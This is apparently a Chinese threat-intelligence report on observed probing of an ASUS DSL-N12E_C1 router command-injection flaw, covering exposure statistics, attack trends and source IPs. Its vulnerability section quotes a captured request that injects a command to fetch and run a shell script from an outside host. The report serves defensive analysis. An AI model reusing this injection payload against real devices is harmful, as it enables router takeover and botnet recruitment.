【格物猎踪】“磨刀霍霍”—ASUS DSL-N12E_C1 RCE漏洞正被探测

执行摘要

近期，我们在排查绿盟威胁捕获系统相关日志的过程中发现，自2020年2月27日起，针对ASUS DSL-N12E_C1 RCE漏洞[1]出现了探测、利用行为。本文将通过脆弱性、暴露情况以及威胁分析三个方面，分析本次捕获到的攻击。

脆弱性分析一节，我们结合互联网公开PoC及捕获到的攻击，分析了攻击手法。

暴露情况分析一节，我们发现2020年1月至2020年7月，互联网中暴露了33000台ASUS DSL-N12E_C1，大部分分布在巴西、澳大利亚和意大利。

威胁分析一节，我们分析了攻击次数和攻击源的分布，发现攻击次数和攻击源数量均没有出现爆发的情况，我们推测针对该漏洞的探测和利用还处于编写、测试EXP模块的阶段。

截至成稿，我们尚未发现针对该漏洞的利用有爆发的迹象，但也应引起各方注意，提前做好预防措施。

一、脆弱性分析

本次我们捕获到的攻击针对ASUS DSL-N12E_C1，漏洞细节参见EDB-ID:48315[1]。该漏洞存在于DSL-N12E_C1的Web服务中，触发RCE的PATH_INFO为：/Main_Analysis_Content.asp。通过向QUERY_STRING中的特定位置插入命令，仅需发送一条GET请求即可触发漏洞。

绿盟科技威胁捕获系统中，捕获到的恶意载荷如下所示：

POST

/Main_Analysis_Content.aspcurrent_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&applyFlag=1&preferred_lang=EN&firmver=1.1.2.3_345-g987b580&cmdMethod=ping&destIP=wget%192.236.163.208/Sep.sh%20;%20sh%20Sep.sh

可以看出，攻击者尝试自行拼接构成一个能够触发该RCE的HTTP请求，但截至截稿，其拼接的恶意载荷均不是完整的HTTP请求，我们认为其实际上无效，但不排除日后攻击者更新的可能。另外，其尝试触发漏洞的请求方式与ExploitDB公布的略有不同，ExploitDB中触发该漏洞的方法为GET，而攻击者请求的方法为POST。

二、 暴露情况分析

通过使用绿盟威胁情报中心对DSL-N12E_C1指纹进行搜索，共发现33000条记录（2020年1月至2020年7月），端口暴露情况分布如图 2.1 所示，从端口分布可以看出RTSP服务默认的554端口暴露最多，其余是常见WEB服务的端口，如7547，8080，80都是HTTP(s)的常用端口。另外，SIP、Telnet、SSH、FTP服务也存在一定的暴露。

图 2.1 暴露的ASUS DSL-N12E_C1开放端口（1000以上）情况（2020年1月至2020年7月）

暴露的ASUS DSL-N12E_C1国家分布（前十）情况如图 2.2 所示，可以看出巴西的暴露数量明显多于其他国家。另外，澳大利亚和意大利也存在超过3000台设备暴露。

图 2.2 暴露的ASUS DSL-N12E_C1国家分布（前十）情况（2020年1月至2020年7月）

三、威胁分析

3.1 攻击趋势

我们对2020年以来，该攻击的次数进行了统计，如图 3.1 所示。发现攻击最早出现在2020年2月27日，2020年3月-4月攻击相对活跃，2020年5月截至截稿，攻击相对平缓，且数量较少。攻击次数较少，说明并未针对该漏洞的利用，目前还处于编写、测试EXP模块的阶段，暂时没有出现爆发的情况，但也应引起注意，做好预防措施。

图 3.1 攻击次数变化趋势

最后，我们统计了攻击源数量变化，2020年1月至2020年7月，相同时间段攻击源数量始终在个位数之间波动，但攻击源的总数量超过了50个。结合较少的攻击次数，从侧面证明了我们的推测，攻击者目前使用了固定的主机测试该漏洞，尚未发动僵尸主机参与扫描。而攻击源总数超过20个则说明，针对该漏洞的攻击源交替活跃，并未出现在同一时段爆发的情况。截至2020年7月，虽然我们暂未发现针对本文所述漏洞的利用出现爆发的迹象，但不排除日后僵尸网络将本文所述漏洞加入武器库的可能性。

3.2典型攻击源分析

我们对捕获到的攻击源进行了分析，发现大部分攻击源还在不同程度地利用其他漏洞，攻击物联网设备。其中部分IP需要引起注意：

193.106.162.134，位于俄罗斯，该攻击源最早于2020年2月1日被我们捕获，出现漏洞探测行为，除对本文所述漏洞进行探测外，还探测了以下漏洞：

- CVE-2017-17215，漏洞利用详情参见EDB-ID：43414[[2]。

- MVPower DVR TV-7104HE 1.8.4 115215B9-Shell命令执行，漏洞利用详情参见EDB-ID：41471[3]。

93.71.247.71，位于意大利，该攻击源最早于2020年2月1日被我们捕获，出现漏洞探测行为，除对本文所述漏洞进行探测外，还探测了以下漏洞：

- CVE-2014-8361，漏洞利用详情参见EDB-ID：37169[4]。

- CVE-2017-17215，漏洞利用详情参见EDB-ID：43414。

- MVPower DVR TV-7104HE 1.8.4 115215B9-Shell命令执行，漏洞利用详情参见EDB-ID：41471。

3.3IoC

部分样本源文件名与SHA256

URLS

参考文献

[1] Exploit DB.ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution. https://www.exploit-db.com/exploits/45135.

[2] ExploitDB. Huawei Router HG532 - Arbitrary Command Execution. https://www.exploit-db.com/exploits/43414.

[3] Exploit DB. MVPower DVR TV-7104HE 1.8.4115215B9 - Shell Command Execution (Metasploit). https://www.exploit-db.com/exploits/41471. https://www.exploit-db.com/exploits/41471.

[4] Exploit DB. Realtek SDK - Miniigd UPnP SOAPCommand Execution (Metasploit). https://www.exploit-db.com/exploits/37169